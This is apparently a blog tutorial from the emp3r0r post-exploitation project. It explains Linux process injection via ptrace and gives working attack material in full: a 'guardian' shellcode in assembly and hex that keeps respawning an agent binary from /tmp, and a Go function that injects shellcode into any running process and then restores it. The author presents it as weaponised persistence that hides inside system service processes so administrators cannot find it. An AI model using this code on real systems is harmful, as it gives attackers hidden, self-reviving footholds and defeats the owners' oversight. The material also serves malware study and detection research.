emp3r0r - Process Injection And Persistence

banner

Process Injection In Linux

Background

The techniques covered in this article are part of emp3r0r project.

Linux has something that other platforms don't, the procfs, as Unix people always like to say "Everything is a file". From /proc/pid/maps we can read the process's memory mappings, and with /proc/pid/mem we can even modify its memory with ease (it's almost the same as modifying an actual file).

Theoretically speaking, we are able to inject code into arbitrary processes, with just procfs and dd. There is even a poc project if you google it.

But since Linux provides an interface for us to tamper with processes, we would just use it if possible.

Unlike Windows, Linux has and only has this one API for process tampering, it is

ptrace

Yeah, it's ptrace.

Then how do we inject code with ptrace?

PTRACE_ATTACH to target process, thus taking control of it
PTRACE_POKETEXT your shellcode at where RIP is pointing
Recover the process with previously backed up code
Shellcode gets executed until int 3 trap, the process gets trapped and giving up control to us
We restore the code, along with the registers
The process executes on, like nothing has ever happened

Restore injected process

It looks easy, doesn't it?

But it's not, the process may or may not recover, it all depends on your shellcode itself. Just restoring the code and registers is not enough, as your shellcode has messed up the stack as well.

And you wouldn't like the shellcode blocking main thread, that way we wouldn't be talking about process recovery anymore, we would be talking about execve.

Yes, some shellcode do execve in the current process, effectively making the original process gone for good.

Therefore, we will just fork a new child, and put our shellcode in it.

You can clone as well, it just doesn't make much difference.

Linux x64 shellcode 101

It's actually a 101 for myself, as I have never written any shellcode before.

With Duckduckgo and some help from some AOSC Linux folks, I was able to roll out my own "hello world" shellcode.

It's much more than a "hello world", it's a guardian shellcode.

How

What language

Of course you write assembly to get your shellcode, that's what it is.

But with the help of a C compiler, the job can be done more quickly, as recommended by a friend:

c-shellcode

As you can see in the code, char buf[] takes care of our "Hello World\n" string data, we don't need to worry about stack allocation anymore.

This article however, will use the traditional assembly way, as I want to learn it.

What editor

I would use vim.

And nasm for assembler.

nasm

I wouldn't use section .data as it brings more \0 bytes.

An nasm assembly code targeting x86_64:

BITS 64
global _start

section .text
_start:
    ...your code...

global _start is like main, it's for linkers. BITS 64 tells nasm this is 64 bit assembly.

hex string

You have to assemble your code into raw bytes:

❯ nasm yourshellcode.asm -o shellcode.bin

And raw bytes to hex string:

❯ xxd -i shellcode.bin | grep 0x | tr -d '[:space:]' | tr -d ',' | sed 's/0x/\\x/g'
\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x48\x83\xf8\x00\x7f\x5e\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x48\x83\xf8\x00\x74\x2c\x48\x31\xff\x48\x89\xc7\x48\x31\xf6\x48\x31\xd2\x4d\x31\xd2\x48\x31\xc0\xb0\x3d\x0f\x05\x48\x31\xc0\xb0\x23\x6a\x0a\x6a\x14\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe2\xc4\x48\x31\xd2\x52\x48\x31\xc0\x48\xbf\x2f\x2f\x74\x6d\x70\x2f\x2f\x65\x57\x54\x5f\x48\x89\xe7\x52\x57\x48\x89\xe6\x6a\x3b\x58\x99\x0f\x05\xcd\x03

With rax2:

❯ rax2 -S < shellcode.bin
4831c04831ffb0390f054883f8007f5e4831c04831ffb0390f054883f800742c4831ff4889c74831f64831d24d31d24831c0b03d0f054831c0b0236a0a6a144889e74831f64831d20f05e2c44831d2524831c048bf2f2f746d702f2f6557545f4889e752574889e66a3b58990f05cd03

rax2 is part of radare2.

syscall

syscall NR

What is a syscall。

Why is it prefixed NR？I looked it up and it seems to be abbreviation of Numeric Reference.

You give Linux an NR to let it know which syscall you are calling.

Here's a comlete syscall table for Linux.

You need to note that syscalls may differ under different architectures.

We care about x86_64 only, BTW why do you even consider writing x86 assembly for Linux? It's 2021 guys, x86 has been deprecated since like ten years ago!

Calling convention

Calling a syscall is no different than calling other functions, it's just we have to do that in assembly, without C compiler's help.

Meaning we need to set up its arguments manually, it's not easy for certain syscalls, but they are all the same:

syscall-call

For x86_64, you put syscall NR into RAX, args into RDI, RSI, RDX... then syscall (aka. int 0x80) to execute the call, RAX gets updated with return value after it's done.

Some syscall arguments are pointer type, you need to pass addresses (instead of data) to them.

A guardian shellcode

This shellcode is part of emp3r0r.

Some tips:

When pointer is required, youpush your data onto the stack, then pass the RSP value
push takes no more than 4 bytes of immediate number, if you need to push more than 4 bytes, store them in a register and push the register instead
Terminate the char array and string array with \0, which you push first
Don't use reserved words in label names, for example, wait

If you were not using nasm, these might not be what you need to see.

And:

Why wait? Because we end up with zombie children if we don't
Why fork twice? Because execve replaces current process with a new image
Why sleep? Because we don't want the CPU to fly
Why int 0x3? Because we have to pause (trap) the shellcode in order to restore the process

    BITS 64

    section .text
    global  _start

_start:
    ;;  fork
    xor rax, rax
    xor rdi, rdi
    mov al, 0x39; syscall fork
    syscall

    cmp rax, 0x0; check return value
    jg  pause; int3 if in parent

watchdog:
    ;;  fork to exec agent
    xor rax, rax
    xor rdi, rdi
    mov al, 0x39; syscall fork
    syscall
    cmp rax, 0x0; check return value
    je  exec; exec if in child

wait4zombie:
    ;;  wait to clean up zombies
    xor rdi, rdi
    mov rdi, rax
    xor rsi, rsi
    xor rdx, rdx
    xor r10, r10
    xor rax, rax
    mov al, 0x3d
    syscall

sleep:
    ;;   sleep
    xor  rax, rax
    mov  al, 0x23; syscall nanosleep
    push 10; sleep nano sec
    push 20; sec
    mov  rdi, rsp
    xor  rsi, rsi
    xor  rdx, rdx
    syscall
    loop watchdog

exec:
    ;;   char **envp
    xor  rdx, rdx
    push rdx; '\0'

    ;;   char *filename
    xor  rax, rax
    mov  rdi, 0x652f2f706d742f2f; path to the executable
    push rdi; save to stack
    push rsp
    pop  rdi
    mov  rdi, rsp; you can delete this as it does nothing

    ;;   char **argv
    push rdx; '\0'
    push rdi
    mov  rsi, rsp; argv[0]

    push 0x3b; syscall execve
    pop  rax; ready to call
    cdq
    syscall

pause:
    ;;  trap
    int 0x3

Weaponize it

Inject shellcode

emp3r0r automatically injects the guardian shellcode into common processes:

inject

Now we have a bunch of guardian code running inside target system's service processes, it would be a disaster for system admins as they can never find where the hell our guardian angel hides, until he reboot the whole system.

If you were interested, write any shellcode to play with.

So how do we inject? Here's emp3r0r's approach:

// Injector inject shellcode to arbitrary running process
// target process will be restored after shellcode has done its job
func Injector(shellcode *string, pid int) error {
    // format
    *shellcode = strings.Replace(*shellcode, ",", "", -1)
    *shellcode = strings.Replace(*shellcode, "0x", "", -1)
    *shellcode = strings.Replace(*shellcode, "\\x", "", -1)

    // decode hex shellcode string
    sc, err := hex.DecodeString(*shellcode)
    if err != nil {
        return fmt.Errorf("Decode shellcode: %v", err)
    }

    // inject to an existing process or start a new one
    // check /proc/sys/kernel/yama/ptrace_scope if you cant inject to existing processes
    if pid == 0 {
        // start a child process to inject shellcode into
        sec := strconv.Itoa(RandInt(10, 30))
        child := exec.Command("sleep", sec)
        child.SysProcAttr = &syscall.SysProcAttr{Ptrace: true}
        err = child.Start()
        if err != nil {
            return fmt.Errorf("Start `sleep %s`: %v", sec, err)
        }
        pid = child.Process.Pid

        // attach
        err = child.Wait() // TRAP the child
        if err != nil {
            log.Printf("child process wait: %v", err)
        }
        log.Printf("Injector (%d): attached to child process (%d)", os.Getpid(), pid)
    } else {
        // attach to an existing process
        proc, err := os.FindProcess(pid)
        if err != nil {
            return fmt.Errorf("%d does not exist: %v", pid, err)
        }
        pid = proc.Pid

        // https://github.com/golang/go/issues/43685
        runtime.LockOSThread()
        defer runtime.UnlockOSThread()
        err = syscall.PtraceAttach(pid)
        if err != nil {
            return fmt.Errorf("ptrace attach: %v", err)
        }
        _, err = proc.Wait()
        if err != nil {
            return fmt.Errorf("Wait %d: %v", pid, err)
        }
        log.Printf("Injector (%d): attached to %d", os.Getpid(), pid)
    }

    // read RIP
    origRegs := &syscall.PtraceRegs{}
    err = syscall.PtraceGetRegs(pid, origRegs)
    if err != nil {
        return fmt.Errorf("my pid is %d, reading regs from %d: %v", os.Getpid(), pid, err)
    }
    origRip := origRegs.Rip
    log.Printf("Injector: got RIP (0x%x) of %d", origRip, pid)

    // save current code for restoring later
    origCode := make([]byte, len(sc))
    n, err := syscall.PtracePeekText(pid, uintptr(origRip), origCode)
    if err != nil {
        return fmt.Errorf("PEEK: 0x%x", origRip)
    }
    log.Printf("Peeked %d bytes of original code: %x at RIP (0x%x)", n, origCode, origRip)

    // write shellcode to .text section, where RIP is pointing at
    data := sc
    n, err = syscall.PtracePokeText(pid, uintptr(origRip), data)
    if err != nil {
        return fmt.Errorf("POKE_TEXT at 0x%x %d: %v", uintptr(origRip), pid, err)
    }
    log.Printf("Injected %d bytes at RIP (0x%x)", n, origRip)

    // peek: see if shellcode has got injected
    peekWord := make([]byte, len(data))
    n, err = syscall.PtracePeekText(pid, uintptr(origRip), peekWord)
    if err != nil {
        return fmt.Errorf("PEEK: 0x%x", origRip)
    }
    log.Printf("Peeked %d bytes of shellcode: %x at RIP (0x%x)", n, peekWord, origRip)

    // continue and wait
    err = syscall.PtraceCont(pid, 0)
    if err != nil {
        return fmt.Errorf("Continue: %v", err)
    }
    var ws syscall.WaitStatus
    _, err = syscall.Wait4(pid, &ws, 0, nil)
    if err != nil {
        return fmt.Errorf("continue: wait4: %v", err)
    }

    // what happened to our child?
    switch {
    case ws.Continued():
        return nil
    case ws.CoreDump():
        err = syscall.PtraceGetRegs(pid, origRegs)
        if err != nil {
            return fmt.Errorf("read regs from %d: %v", pid, err)
        }
        return fmt.Errorf("continue: core dumped: RIP at 0x%x", origRegs.Rip)
    case ws.Exited():
        return nil
    case ws.Signaled():
        err = syscall.PtraceGetRegs(pid, origRegs)
        if err != nil {
            return fmt.Errorf("read regs from %d: %v", pid, err)
        }
        return fmt.Errorf("continue: signaled (%s): RIP at 0x%x", ws.Signal(), origRegs.Rip)
    case ws.Stopped():
        stoppedRegs := &syscall.PtraceRegs{}
        err = syscall.PtraceGetRegs(pid, stoppedRegs)
        if err != nil {
            return fmt.Errorf("read regs from %d: %v", pid, err)
        }
        log.Printf("Continue: stopped (%s): RIP at 0x%x", ws.StopSignal().String(), stoppedRegs.Rip)

        // restore registers
        err = syscall.PtraceSetRegs(pid, origRegs)
        if err != nil {
            return fmt.Errorf("Restoring process: set regs: %v", err)
        }

        // breakpoint hit, restore the process
        n, err = syscall.PtracePokeText(pid, uintptr(origRip), origCode)
        if err != nil {
            return fmt.Errorf("POKE_TEXT at 0x%x %d: %v", uintptr(origRip), pid, err)
        }
        log.Printf("Restored %d bytes at origRip (0x%x)", n, origRip)

        // let it run
        err = syscall.PtraceDetach(pid)
        if err != nil {
            return fmt.Errorf("Continue detach: %v", err)
        }
        log.Printf("%d will continue to run", pid)

        return nil
    default:
        err = syscall.PtraceGetRegs(pid, origRegs)
        if err != nil {
            return fmt.Errorf("read regs from %d: %v", pid, err)
        }
        log.Printf("continue: RIP at 0x%x", origRegs.Rip)
    }

    return nil
}

This is probably the first ptrace based linux process injection tool written in pure Go.

Several things to notice if you want to build your own:

Go's syscall wrappers are undocumented
ptrace has to stay in one thread otherwise you lose your tracee, this is a Linux/Unix issue
but it's also a Go issue, as Go loves using goroutine. I had to put runtime.LockOSThread() before syscall.Ptrace* to solve this issue

I would like to give Go a medal for its PTRACE_POKETEXT and PTRACE_PEEKTEXT wrapper, because not having to peek/poke one word at a time is such a relief for lazy users like me.

The key point here is int 0x3, it causes the current process to pause (trap), giving its parent (tracer) full control, and that's when we start to restore the original process.

Get persistence with shellcode

Injecting the guardian shellcode into some import service processes, is a better way to get "persistence".

It's hard to get caught, and easy to resurrect our agent.

This is a simple sleep demo program, which we will inject into.

/*
 * This program is used to check shellcode injection
 * */

#include <stdio.h>
#include <time.h>
#include <unistd.h>

int main(int argc, char* argv[])
{
    time_t rawtime;
    struct tm* timeinfo;

    while (1) {
        sleep(1);
        time(&rawtime);
        timeinfo = localtime(&rawtime);
        printf("%s: sleeping\n", asctime(timeinfo));
    }
    return 0;
}

The sleep program sleeps on, with a new child process to guard our agent.

demo

jm33_ng